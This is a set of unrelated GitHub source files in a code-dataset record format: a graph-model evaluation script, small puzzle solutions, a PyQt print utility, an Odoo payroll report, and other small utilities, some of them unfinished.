pred_test_comm_comm_labels, comm_path_to_user_path_mapping):\n    test_user_user_labels = []\n    test_user_user_edges = []\n    \n    test_eval = {}\n    for comm_to_comm_edge, comm_to_comm_label in 
zip(pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels):\n\n for user_edge in comm_path_to_user_path_mapping[tuple(comm_to_comm_label)]:\n test_user_user_labels.append(comm_to_comm_edge.item())\n test_user_user_edges.append(user_edge)\n # if not tuple(comm_to_comm_label) in test_eval:\n # test_eval[tuple(comm_to_comm_label)] = {}\n # test_eval[tuple(comm_to_comm_label)][tuple(user_edge)] = (comm_to_comm_edge.item(), gt_user_user_labels[gt_user_user_edges.index(user_edge)])\n \n gt_user_user_edges, gt_user_user_labels = utils.simulsort(gt_user_user_edges, gt_user_user_labels)\n user_level_pathway_with_neg, user_level_pathway_with_neg_labels = utils.simulsort(test_user_user_edges, test_user_user_labels)\n # print(list(zip(pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels)))\n # print(list(zip(user_level_pathway_with_neg, user_level_pathway_with_neg_labels)))\n \n \n return roc_auc_score(gt_user_user_labels, user_level_pathway_with_neg_labels),\\\n f1_score(gt_user_user_labels, [int(ele) for ele in user_level_pathway_with_neg_labels], average=\"micro\"),\\\n accuracy_score(gt_user_user_labels, [int(ele) for ele in user_level_pathway_with_neg_labels])\n\n\ndef information_pathway_evaluation(preds, ground_truths):\n agg_acc = []\n for pred,ground_truth in zip(preds, ground_truths):\n agg_acc.append(accuracy_score(ground_truth.cpu().numpy().astype(int), pred.cpu().numpy().astype(int)))\n\n return mean(agg_acc)\n\n\ndef main(config):\n \n cached_datapath = os.path.join(config.cached_datapath,f\"cached_{config.community_aggregation_type}_{config.community_embedding_model_name}.pkl\") \n training_instances_path = os.path.join(config.info_pathway_instances_datapath, config.training_instances_filename)\n evaluation_instances_path = os.path.join(config.info_pathway_instances_datapath, config.training_instances_filename)\n \n training_community_features_path = os.path.join(config.comm_feats_datapath, config.training_comm_features)\n evaluation_community_features_path = os.path.join(config.comm_feats_datapath, config.eval_comm_features)\n \n training_article_features_path = os.path.join(config.article_features_datapath, config.training_article_features)\n evaluation_article_features_path = os.path.join(config.article_features_datapath, config.eval_article_features)\n \n modelname = f\"{config.community_aggregation_type}_{config.community_embedding_model_name}\"\n \n model_output_path = os.path.join(config.best_model_output_path, f\"{modelname}.pt\")\n\n training_instances, num_comm_nodes, num_article_nodes, metadata, hetero_validation_insts, hetero_testing_insts = prepare_training_data(training_instances_path, evaluation_instances_path, training_community_features_path, evaluation_community_features_path, training_article_features_path, evaluation_article_features_path, config.subgraph_min_size, config.subgraph_max_size, cached_datapath, overwrite=False)\n \n # subgraph_max_size = 25 #500\n # subgraph_min_size = 4\n\n test_results = {}\n \n print(\"Validation instances\", len(hetero_validation_insts))\n print(\"Testing instances\", len(hetero_testing_insts))\n model = utils.load_model(model_output_path)\n model = model.to(device)\n \n preds = []\n ground_truths = []\n \n val_avg_cc_f1 = []\n val_avg_cc_auc = []\n val_avg_cc_acc = []\n model.eval()\n with torch.no_grad():\n for sampled_data in tqdm(hetero_validation_insts):\n \n sampled_data.to(device)\n \n comm_to_comm_with_neg = sampled_data['community', 'interacts_with', 'community'].edge_labels\n pred_test_comm_comm_labels = 
sampled_data['community', 'interacts_with', 'community'].edge_labels_str\n comm_path_to_user_path_mapping = sampled_data['community', 'interacts_with', 'community'].comm_user_map\n gt_user_user_labels = sampled_data['community', 'interacts_with', 'community'].user_edge_labels\n gt_user_user_edges = sampled_data['community', 'interacts_with', 'community'].user_edge_labels_str\n \n pred_comm_to_comm_edges_w_neg = model(sampled_data).clamp(min=0,max=1)\n \n preds.append(pred_comm_to_comm_edges_w_neg)\n \n ground_truths.append(comm_to_comm_with_neg)\n \n val_cc_f1, val_cc_auc, val_cc_acc = cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels, comm_path_to_user_path_mapping)\n val_avg_cc_f1.append(val_cc_f1)\n val_avg_cc_auc.append(val_cc_auc)\n val_avg_cc_acc.append(val_cc_acc)\n \n pred = torch.cat(preds, dim=0).cpu().numpy()\n ground_truth = torch.cat(ground_truths, dim=0).cpu().numpy()\n\n ipp_acc = information_pathway_evaluation(preds, ground_truths)\n roc_auc = roc_auc_score(ground_truth.reshape(len(ground_truth), 1), pred.reshape(len(ground_truth), 1))\n micro_f1 = f1_score(ground_truth.astype(int), pred.astype(int), average=\"micro\")\n macro_f1 = f1_score(ground_truth.astype(int), pred.astype(int), average=\"macro\")\n avg_pr = average_precision_score(ground_truth.astype(int), pred.astype(int))\n precision, recall, thresholds = precision_recall_curve(ground_truth.astype(int), pred.astype(int))\n aupr = auc(recall, precision)\n \n print(f\"Validation XCOMM AUC: {sum(val_avg_cc_f1)/len(val_avg_cc_f1):.4f}\")\n print(f\"Validation XCOMM micro f1: {sum(val_avg_cc_auc)/len(val_avg_cc_auc):.4f}\")\n print(f\"Validation XCOMM IPP Accuracy: {sum(val_avg_cc_acc)/len(val_avg_cc_acc):.4f}\")\n \n print(f\"Validation AUC: {roc_auc:.4f}\")\n print(f\"Validation micro f1: {micro_f1:.4f}\")\n print(f\"Validation macro f1: {macro_f1:.4f}\")\n print(f\"Validation IPP Accuracy: {ipp_acc:.4f}\")\n print(\"--------- Imbalanced Data Metrics ---------\")\n print(f\"Validation Avg. 
Precision-Recall: {avg_pr:.4f}\")\n    print(f\"Validation AUPR: {aupr:.4f}\")\n    \n    best_roc_auc = (sum(val_avg_cc_f1)/len(val_avg_cc_f1))\n    \n    testing_preds = []\n    testing_ground_truths = []\n    \n    test_avg_cc_f1 = []\n    test_avg_cc_auc = []\n    test_avg_cc_acc = []\n    for sampled_data in tqdm(hetero_testing_insts):\n        sampled_data.to(device)\n        \n        comm_to_comm_with_neg = sampled_data['community', 'interacts_with', 'community'].edge_labels\n        pred_test_comm_comm_labels = sampled_data['community', 'interacts_with', 'community'].edge_labels_str\n        comm_path_to_user_path_mapping = sampled_data['community', 'interacts_with', 'community'].comm_user_map\n        gt_user_user_labels = sampled_data['community', 'interacts_with', 'community'].user_edge_labels\n        gt_user_user_edges = sampled_data['community', 'interacts_with', 'community'].user_edge_labels_str\n        \n        pred_comm_to_comm_edges_w_neg = model(sampled_data).clamp(min=0,max=1)\n        testing_preds.append(pred_comm_to_comm_edges_w_neg)\n        testing_ground_truths.append(comm_to_comm_with_neg)\n        \n        test_cc_f1, test_cc_auc, test_cc_acc = cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels, comm_path_to_user_path_mapping)\n        test_avg_cc_f1.append(test_cc_f1)\n        test_avg_cc_auc.append(test_cc_auc)\n        test_avg_cc_acc.append(test_cc_acc)\n    \n    testing_pred = torch.cat(testing_preds, dim=0).cpu().numpy()\n    testing_ground_truth = torch.cat(testing_ground_truths, dim=0).cpu().numpy()\n    \n    # print(set(list(testing_pred.astype(int))), set(list(testing_ground_truth.astype(int))))\n    testing_ipp_acc = information_pathway_evaluation(testing_preds, testing_ground_truths)\n    testing_roc_auc = roc_auc_score(testing_ground_truth.reshape(len(testing_ground_truth), 1), testing_pred.reshape(len(testing_ground_truth), 1))\n    testing_micro_f1 = f1_score(testing_ground_truth.astype(int), testing_pred.astype(int), average=\"micro\")\n    testing_macro_f1 = f1_score(testing_ground_truth.astype(int), testing_pred.astype(int), average=\"macro\")\n    # imbalanced-data metrics on the held-out testing split\n    testing_avg_pr = average_precision_score(testing_ground_truth.astype(int), testing_pred.astype(int))\n    testing_precision, testing_recall, testing_thresholds = precision_recall_curve(testing_ground_truth.astype(int), testing_pred.astype(int))\n    testing_aupr = auc(testing_recall, testing_precision)\n
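    # Added note (sketch): under heavy class imbalance the PR curve summarizes\n    # ranking quality better than ROC; the pattern mirrors the calls above, e.g.\n    #   p, r, _ = precision_recall_curve([0, 1, 1], [0.1, 0.8, 0.4])\n    #   toy_aupr = auc(r, p)\n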
Precision-Recall\": testing_avg_pr,\n \"Validation AUPR\": testing_aupr\n }\n\n \n print(f\"Final Testing Results: {modelname}\")\n print(\"--------------------------\")\n copy_paste_string = []\n for test_result in test_results:\n print(f\"{test_result}: {test_results[test_result]}\")\n copy_paste_string.append(str(test_results[test_result]))\n print(\"--------------------------\")\n print(\",\".join(copy_paste_string))\n print(\"--------------------------\")\n \n bl_ground_truths = []\n for sampled_data in tqdm(hetero_testing_insts):\n bl_ground_truths.append(sampled_data['community', 'interacts_with', 'community'].edge_labels)\n \n bl_agg_gts = torch.cat(bl_ground_truths, dim=0).cpu().tolist()\n print(\"BL Always Negative\", accuracy_score(bl_agg_gts, [0] * len(bl_agg_gts)))\n print(\"--------------------------\")\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read configuration JSON file')\n parser.add_argument('config', type=str, help='Path to the configuration JSON file')\n args = parser.parse_args()\n\n config = utils.read_config(args.config)\n config.update(args.__dict__)\n config = argparse.Namespace(**config)\n global device\n device = config.cuda_device\n main(config)","repo_name":"ataylor24/Stealth","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28730575785","text":"input_str = \"\"\"The First-ever Open-water Beluga Sanctuary will Welcome to\nAdorable Whales in June,Adorable beluga whales are a pupular attraction to aquariums\naround the world,but like many other wild animals,they also risk losing their habitats\ndue to human intervention such as population growth,new buildings along the coastline,\nfishing,and other problems that sea creatures face.\"\"\"\ndef calc_statistic(input_str): # 计算英文字母出现的频率\n result = [0] * 26 # 构建结果列表。26个0组成的列表\n for c in input_str: # 对于字符串中的每个字符\n if c.isalpha(): # 判断是否为字母\n c = c.lower() # 统一转换为小写\n index = ord(c) - ord('a') # 计算出其相对a的位置\n result[index] = result[index] + 1 # 将出现次数加1\n for ele in range(0,26): # \n c = chr(ord('a') + ele)\n print(\"[%s] 出现的次数为 %d\" % (c,result[ele]))\n\ncalc_statistic(input_str)\n","repo_name":"Tonynovtop/Learning-Python","sub_path":"cal_statisticalpha.py","file_name":"cal_statisticalpha.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29514638230","text":"# https://open.kattis.com/problems/ptice\nadrian_seq = [\"A\", \"B\", \"C\"]\nbruno_seq = [\"B\", \"A\", \"B\", \"C\"]\ngoran_seq = [\"C\", \"C\", \"A\", \"A\", \"B\", \"B\"]\n\ndef applicant(seq: list):\n n = 0\n while n < len(seq):\n yield seq[n]\n n += 1\n yield next(applicant(seq))\n\nadrian = applicant(adrian_seq)\nbruno = applicant(bruno_seq)\ngoran = applicant(goran_seq)\n\nn_questions = input()\nexam = input()\nexam.split()","repo_name":"Menkeyshow/KattisProblemArchive","sub_path":"unsolved/ptice.py","file_name":"ptice.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27288168188","text":"from collections import deque\n\nN, K = map(int, input().split())\nq = deque(_ for _ in range(1, N+1))\nr = []\n\n\ndef josephus():\n p = 0\n while len(q):\n for _ in range(len(q) - 1):\n left = q.popleft()\n q.append(left)\n p += 1\n\n print(q)\n\n if p == K:\n 
","repo_name":"Tonynovtop/Learning-Python","sub_path":"cal_statisticalpha.py","file_name":"cal_statisticalpha.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29514638230","text":"# https://open.kattis.com/problems/ptice\nadrian_seq = [\"A\", \"B\", \"C\"]\nbruno_seq = [\"B\", \"A\", \"B\", \"C\"]\ngoran_seq = [\"C\", \"C\", \"A\", \"A\", \"B\", \"B\"]\n\ndef applicant(seq: list):\n    n = 0\n    while n < len(seq):\n        yield seq[n]\n        n += 1\n    yield next(applicant(seq))\n\nadrian = applicant(adrian_seq)\nbruno = applicant(bruno_seq)\ngoran = applicant(goran_seq)\n\nn_questions = input()\nexam = input()\nexam.split()","repo_name":"Menkeyshow/KattisProblemArchive","sub_path":"unsolved/ptice.py","file_name":"ptice.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27288168188","text":"from collections import deque\n\nN, K = map(int, input().split())\nq = deque(_ for _ in range(1, N+1))\nr = []\n\n\ndef josephus():\n    # rotate so the K-th person is at the front, then remove them\n    while q:\n        q.rotate(-(K - 1))\n        r.append(q.popleft())\n\n\njosephus()\nprint(r)\n","repo_name":"o-henry/ps","sub_path":"a/1158.py","file_name":"1158.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71506967517","text":"import sys\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui, QtPrintSupport\n\n\nclass PrintList:\n    def __init__(self):\n        self.printer = QtPrintSupport.QPrinter()\n        self.headerFont = QtGui.QFont(\"Arial\", pointSize=10, weight=QtGui.QFont.Weight.Bold)\n        self.bodyFont = QtGui.QFont(\"Arial\", pointSize=10)\n        self.footerFont = QtGui.QFont(\"Arial\", pointSize=9, italic=True)\n        self.headerFlags = QtCore.Qt.AlignmentFlag.AlignHCenter | QtCore.Qt.TextFlag.TextWordWrap\n        self.bodyFlags = QtCore.Qt.TextFlag.TextWordWrap\n        self.footerFlags = QtCore.Qt.AlignmentFlag.AlignHCenter | QtCore.Qt.TextFlag.TextWordWrap\n        color = QtGui.QColor(QtGui.QColorConstants.Black)\n        self.headerPen = QtGui.QPen(color, 2)\n        self.bodyPen = QtGui.QPen(color, 1)\n        self.margin = 5\n        self._resetData()\n\n    def _resetData(self):\n        self.headers = None\n        self.columnWidths = None\n        self.data = None\n        self._brush = QtCore.Qt.BrushStyle.NoBrush\n        self._currentRowHeight = 0\n        self._currentPageHeight = 0\n        self._headerRowHeight = 0\n        self._footerRowHeight = 0\n        self._currentPageNumber = 1\n        self._painter = None\n\n    def printData(self):\n        self._painter = QtGui.QPainter()\n        self._painter.begin(self.printer)\n        self._painter.setBrush(self._brush)\n        if self._headerRowHeight == 0:\n            self._painter.setFont(self.headerFont)\n            self._headerRowHeight = self._calculateRowHeight(self.columnWidths, self.headers)\n        if self._footerRowHeight == 0:\n            self._painter.setFont(self.footerFont)\n            self._footerRowHeight = self._calculateRowHeight([self.printer.width()], \"Page\")\n        for i in range(len(self.data)):\n            height = self._calculateRowHeight(self.columnWidths, self.data[i])\n            if self._currentPageHeight + height > self.printer.height() - self._footerRowHeight - 2 * self.margin:\n                self._printFooterRow()\n                self._currentPageHeight = 0\n                self._currentPageNumber += 1\n                self.printer.newPage()\n            if self._currentPageHeight == 0:\n                self._painter.setPen(self.bodyPen)\n                self._painter.setFont(self.bodyFont)\n            self.printRow(self.columnWidths, self.data[i], height, self.bodyFlags)\n\n        self._printFooterRow()\n        self._painter.end()\n        self._resetData()\n\n    def _calculateRowHeight(self, widths, cellData):\n        height = 0\n        for i in range(len(widths)):\n            r = self._painter.boundingRect(0, 0, widths[i] - 2 * self.margin, 50, QtCore.Qt.TextFlag.TextWordWrap,\n                                           str(cellData[i]))\n            h = r.height() + 2 * self.margin\n            if height < h:\n                height = h\n\n        return height\n\n    def printRow(self, widths, cellData, height, flags):\n        x = 0\n        for i in range(len(widths)):\n            self._painter.drawText(x + self.margin, self._currentPageHeight + self.margin, widths[i] - self.margin,\n                                   height - 2 * self.margin,\n                                   flags, str(cellData[i]))\n            self._painter.drawRect(x, self._currentPageHeight, widths[i], height)\n            x += widths[i]\n        self._currentPageHeight += height\n\n    def _printFooterRow(self):\n        self._painter.setFont(self.footerFont)\n        self._painter.drawText(self.margin, self.printer.height() - self._footerRowHeight - self.margin,\n                               self.printer.width() - 2 * self.margin, self._footerRowHeight - 2 * self.margin,\n                               self.footerFlags, \"Page \" + str(self._currentPageNumber))\n\n\napp = QtWidgets.QApplication(sys.argv)\npl = PrintList()\n# If PDF output is needed,\n# uncomment the line below:\npl.printer.setOutputFileName(\"output.pdf\")\ndata = []\n# pl.headerFlags = QtCore.Qt.AlignmentFlag.AlignCenter | QtCore.Qt.TextFlag.TextWordWrap\nfor b in range(1, 101):\n    data.append([b, b ** 2, b ** 3])\npl.data = data\npl.columnWidths = [100, 100, 200]\npl.headers = [\"Number\", \"Square\", \"Cube\"]\npl.printData()\n
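\n# Added note (assumption): to target a physical printer instead of a PDF file,\n# skip setOutputFileName() above and let the user pick a device first, e.g.:\n#   dialog = QtPrintSupport.QPrintDialog(pl.printer)\n#   dialog.exec_()  # returns QDialog.Accepted when the user confirms\n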
","repo_name":"D4Gj/lessons","sub_path":"Lesson_44/printList.py","file_name":"printList.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73660807519","text":"import csv\nimport difflib\n\nimport django\ndjango.setup()\nimport typer\nimport json\nfrom sefaria.model import *\nfrom sefaria.utils.hebrew import strip_cantillation\nimport random\nimport os\nfrom langchain.chat_models import ChatOpenAI\nimport openai\napi_key = os.getenv(\"OPENAI_API_KEY\")\n\n\nseed_value = 613\nrandom.seed(seed_value)\n\n# def create_data(output_training_filename: str, output_validation_filename: str):\n#     all_samples = []\n#     for masechet in masechtot_ordered:\n#         print(\"creating data from Masechet \" + masechet)\n#         all_segment_refs = Ref(masechet).all_segment_refs()\n#         for segment_ref in all_segment_refs:\n#             non_punctuated = segment_ref.text('he', \"William Davidson Edition - Aramaic\").text\n#             punctuated = strip_cantillation(segment_ref.text('he').text, strip_vowels=True)\n#             steinsalz = Ref(\"Steinsaltz on \" + segment_ref.normal()).text('he').text\n#             all_samples.append(create_new_context(task_desciption, non_punctuated, steinsalz, punctuated))\n#         if masechet == last_masechet:\n#             break\n#\n#     #get only limited num of samples\n#     samples_trimmed = []\n#     samples_trimmed = random.sample(all_samples, sample_size)\n#\n#     # Calculate the number of items for training\n#     num_train = int(len(samples_trimmed) * train_proportion)\n#\n#     # Use random.sample to partition the list according to the seed\n#     train_samples = random.sample(samples_trimmed, num_train)\n#     validation_samples = [item for item in samples_trimmed if item not in train_samples]\n#\n#     with open(output_training_filename, 'w', encoding='utf-8') as jsonl_file:\n#         for json_obj in train_samples:\n#             # Use ensure_ascii=False to encode Unicode characters\n#             json_line = json.dumps(json_obj, ensure_ascii=False)\n#             jsonl_file.write(json_line + '\\n')\n#     with open(output_validation_filename, 'w', encoding='utf-8') as jsonl_file:\n#         for json_obj in validation_samples:\n#             # Use ensure_ascii=False to encode Unicode characters\n#             json_line = json.dumps(json_obj, ensure_ascii=False)\n#             jsonl_file.write(json_line + '\\n')\n#\n#\n#     print(\"TRAINING SAMPLES: \" + str(len(train_samples)))\n#     print(\"VALIDATION SAMPLES: \" + str(len(validation_samples)))\ndef write_lists_to_csv(list1, list2, filename, header1, header2):\n    # Combine the lists into a list of tuples\n    data = list(zip(list1, list2))\n\n    # Open the CSV file in write mode\n    with open(filename, 'w', newline='', encoding='utf-8') as csvfile:\n        # Create a CSV writer\n        csvwriter = csv.writer(csvfile)\n\n        # Write the headers\n        csvwriter.writerow([header1, header2])\n\n        # Write the data\n        csvwriter.writerows(data)\ndef read_json_lines_to_list(file_path):\n    data_list = []\n\n    with open(file_path, 'r', encoding='utf-8') as json_file:\n        for line in json_file:\n            try:\n                data = json.loads(line)\n                data_list.append(data)\n            except json.JSONDecodeError as e:\n                print(f\"Error decoding JSON: {e}\")\n\n    return data_list\n\ndef get_response_openai(sample, model_name):\n    response = 
openai.ChatCompletion.create(\n model=model_name,\n messages=[\n {\n \"role\": \"system\",\n \"content\": sample[\"messages\"][0][\"content\"]\n },\n {\n \"role\": \"user\",\n \"content\": sample[\"messages\"][1][\"content\"]\n }\n\n ],\n temperature=1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n # print(response)\n inference = response[\"choices\"][0][\"message\"][\"content\"]\n return(inference)\n\n\n print() # Move to the next line\nif __name__ == '__main__':\n # typer.run(visualize)\n print(\"hi\")\n model_name = \"ft:gpt-3.5-turbo-0613:sefaria:he-punct:8ClpgehI\"\n golden_standard = read_json_lines_to_list('../output/gpt_punctuation_validation.jsonl')\n golden_standard = random.sample(golden_standard, 50)\n inferred = []\n for sample in golden_standard:\n inferred.append(get_response_openai(sample, model_name))\n golden_standard_valids = [sample[\"messages\"][2][\"content\"] for sample in golden_standard]\n # golden_standard_valids_steinsaltz = [sample[\"messages\"][1][\"content\"].split('\"steinsaltz\":')[1][:-1] for sample in golden_standard]\n write_lists_to_csv(golden_standard_valids, inferred, '../output/discrepancies_visualization.csv', \"Gold\", \"Inferred\")\n\n\n\n\n\n","repo_name":"Sefaria/LLM","sub_path":"talmud_punctuation/fine_tune/project_scripts/compare_gold_with_inferred.py","file_name":"compare_gold_with_inferred.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"6025442560","text":"class Solution:\n def nextGreatestLetter(self, letters: List[str], target: str) -> str:\n if letters[-1] <= target:\n return letters[0]\n \n l = 0\n r = len(letters) - 1\n ans = float(\"inf\")\n while l <= r:\n mid = (l + r)//2\n if letters[mid] > target:\n ans = min(mid, ans)\n r = mid - 1\n else:\n l = mid + 1\n return letters[ans]\n \n ","repo_name":"sugeeth14/leetcode-problems","sub_path":"744-find-smallest-letter-greater-than-target/744-find-smallest-letter-greater-than-target.py","file_name":"744-find-smallest-letter-greater-than-target.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74158023837","text":"from glob import glob\n\n\ndef read_stuff(fname):\n\n with open(fname, 'r') as fd:\n data = fd.readlines()\n assert len(data) == 1\n\n return data[0].strip()\n\n\nfor fname in glob('/proc/[0-9]*/oom_adj'):\n\n # Values of oom_adj :\n # -17 = immune to oom killer\n # -16 = very unlikely to be killed\n # ...\n # +15 = very likely to be killed\n\n oom_adj = int(read_stuff(fname))\n if oom_adj >= 0:\n continue\n\n cmdline = read_stuff(fname.replace('oom_adj', 'cmdline')).split('\\0')[0]\n\n print(f'{cmdline} -> {oom_adj}')\n","repo_name":"dargor/system-tools","sub_path":"oom_adj.py","file_name":"oom_adj.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11622487817","text":"#-*- encoding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, RedirectWarning, ValidationError\n\n#PARA FECHAS\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\nimport pytz\nimport time\nimport logging\n_logger = logging.getLogger(__name__)\n#OTROS\nimport re\n\nclass ReportStockRule(models.AbstractModel):\n _name = 'report.l10n_mx_payroll.report_payroll_list'\n _description = 'Payroll List Report'\n \n \n 
@api.model\n def _get_report_values(self, docids, data={}):\n rec_ids = data.get('active_ids', [])\n payroll_list = self.env['hr.payslip.run'].browse(rec_ids)\n #payroll_list = self.env['hr.payslip.run'].browse(docids)\n _logger.info(\"data: %s\" % data)\n _logger.info(\"payroll_list: %s\" % payroll_list)\n \n if not payroll_list.slip_ids.filtered(lambda x: x.state in ('draft','verify','done')):\n raise UserError(_(\"No existen Nóminas para la Impresión del Reporte.\"))\n \n # Departamentos\n if data.get('departments', False):\n departments = \"and contract.department_id in (%s)\" % str(data.get('departments')).replace('[','').replace(']','')\n department_ids = data.get('departments')\n else:\n departments = \"and contract.department_id is not null\"\n department_ids = False\n \n # Empleados\n if data.get('employees', False):\n employees = \"and contract.employee_id in (%s)\" % str(data.get('employees')).replace('[','').replace(']','')\n employee_ids = data.get('employees')\n else:\n employees = \"\"\n employee_ids = False\n _logger.info(\"employee_ids: %s\" % employee_ids)\n \n # Puestos de Trabajo \n if data.get('jobs', False):\n jobs = \"and contract.job_id in (%s)\" % str(data.get('jobs')).replace('[','').replace(']','')\n job_ids = data.get('jobs')\n else:\n jobs = \"\"\n job_ids = False\n _logger.info(\"job_ids: %s\" % job_ids)\n \n # Analiticas\n if data.get('analytic_accounts', False):\n analytic_accounts = \"and contract.analytic_account_id in (%s)\" % str(data.get('analytic_accounts')).replace('[','').replace(']','')\n analytic_account_ids = self.env['account.analytic.account'].browse(data.get('analytic_accounts'))\n else:\n analytic_accounts = \"\"\n analytic_account_ids = False\n _logger.info(\"analytic_account_ids: %s\" % job_ids)\n \n # Tipo de Empleado\n if data.get('tipo_empleado', False) != 'all':\n tipo_empleado = \"and contract.sindicalizado='%s'\" % data.get('tipo_empleado')\n tipo_empleados = [data.get('tipo_empleado')]\n else:\n tipo_empleado = \"\"\n tipo_empleados = False\n \n date_from = payroll_list.date_start.strftime('%d/%m/%Y')\n date_to = payroll_list.date_end.strftime('%d/%m/%Y')\n total_no_empleados = 0 #No. 
de empleados\n \n self.env.cr.execute(\"\"\"\n select distinct contract.id\n from hr_payslip slip\n inner join hr_contract contract on slip.contract_id=contract.id %s %s %s %s %s\n where slip.payslip_run_id=%s and slip.state in ('draft','verify','done');\n \"\"\" % (departments, employees, jobs, \n tipo_empleado, analytic_accounts, payroll_list.id))\n \n contract_ids = [item['id'] for item in self.env.cr.dictfetchall()]\n if not contract_ids:\n raise ValidationError(_(\"No se encontraton Nóminas con los parámetros indicados.\"))\n #raise ValidationError('contract_ids: %s' % contract_ids)\n self.env.cr.execute(\"\"\"\n select distinct contract.department_id\n from hr_payslip slip\n inner join hr_contract contract on slip.contract_id=contract.id and contract.id in (%s)\n where slip.payslip_run_id=%s and slip.state in ('draft','verify','done');\n \"\"\" % (','.join(str(_c) for _c in contract_ids), payroll_list.id))\n \n department_ids = (x[0] for x in self.env.cr.fetchall())\n if not department_ids:\n raise ValidationError(_(\"No se encontraton Nóminas con los parámetros indicados.\"))\n \n departments = self.env['hr.department'].browse(department_ids)\n conceptos_por_departamento = {}\n for department in departments:\n # Debug\n _logger.info(\"Procesando: [%s] %s\" % (department.id, department.complete_name))\n # Fin Debug\n conceptos_por_departamento[department.id] = {\n 'percepciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=department, \n contracts=contract_ids,\n tipo='percepciones'),\n 'deducciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=department, \n contracts=contract_ids,\n tipo='deducciones'),\n }\n _logger.info(\"\\nconceptos_por_departamento[department.id]: %s\" % conceptos_por_departamento[department.id])\n #raise ValidationError(\"Pausa\")\n # Debug\n #for x in conceptos_por_departamento.keys():\n # _logger.info(\"\\nconceptos_por_departamento[%s]: %s\" % (x, conceptos_por_departamento[x]))\n # Fin Debug\n conceptos_todos_departamentos = {\n 'percepciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=departments, \n contracts=contract_ids,\n tipo='percepciones'),\n 'deducciones' : self.get_payroll_lines(\n payroll_list=payroll_list, \n department=departments, \n contracts=contract_ids,\n tipo='deducciones'),\n }\n \n # Debug\n #_logger.info(\"\\nconceptos_todos_departamentos: %s\" % conceptos_todos_departamentos)\n # Fin Debug\n _logger.info(\"contract_ids: %s\" % contract_ids)\n data = {\n 'docs' : payroll_list,\n 'departments' : departments,\n 'contracts' : contract_ids,\n 'date_from' : date_from,\n 'date_to' : date_to,\n 'conceptos_por_departamento' : conceptos_por_departamento,\n 'conceptos_todos_departamentos' : conceptos_todos_departamentos,\n }\n #raise ValidationError(\"Pausa\")\n return data\n\n\n def get_payroll_lines(self, payroll_list=False, department=False, contracts=False, tipo=False):\n conceptos = self.env['hr.payslip.line'].browse()\n _logger.info(\"contracts: %s - tipo: %s\" % (contracts, tipo))\n for nomina in payroll_list.slip_ids.filtered(lambda w: w.contract_id.id in contracts):\n if nomina.contract_id.department_id.id not in department.ids:\n _logger.info(\"saltando...\")\n continue\n if tipo=='percepciones':\n conceptos += nomina.percepciones_ids + nomina.otrospagos_ids.filtered(lambda w: w.salary_rule_id.tipootropago_id.code!='002')\n elif tipo=='deducciones':\n conceptos += nomina.deducciones_ids + nomina.otrospagos_ids.filtered(lambda w: 
w.salary_rule_id.tipootropago_id.code=='002' and not w.no_suma)\n \n data ={}\n for line in conceptos:\n if line.salary_rule_id.id not in data.keys():\n data[line.salary_rule_id.id] = {'name' : line.name,\n 'salary_rule_id' : line.salary_rule_id,\n 'total': (line.total * -1.0) if tipo=='deducciones' and line.salary_rule_id.tipootropago_id.code=='002' else line.total}\n else:\n data[line.salary_rule_id.id]['total'] += (line.total * -1.0) if tipo=='deducciones' and line.salary_rule_id.tipootropago_id.code=='002' else line.total\n return data\n \n \n","repo_name":"germanponce/odoo-mexico-payroll-ce-v14","sub_path":"l10n_mx_payroll/report/report_payroll_list.py","file_name":"report_payroll_list.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4666282447","text":"class LFUCache:\n\n def __init__(self, capacity: int):\n self.tracker = dict()\n self.freqQueues = dict()\n self.counter = [0 for i in range(100001)]\n self.freqQueues[1] = []\n self.lowFreq = 1\n self.currSize = 0\n self.maxSize = capacity\n\n def get(self, key: int) -> int:\n if key not in self.tracker: return -1\n self.counter[key] += 1\n if self.counter[key] not in self.freqQueues: self.freqQueues[self.counter[key]] = []\n self.freqQueues[self.counter[key]].append(key)\n return self.tracker[key]\n\n def put(self, key: int, value: int) -> None:\n if key not in self.tracker:\n if self.maxSize == 0: return\n if self.currSize == self.maxSize:\n found = False\n while not found:\n curr = 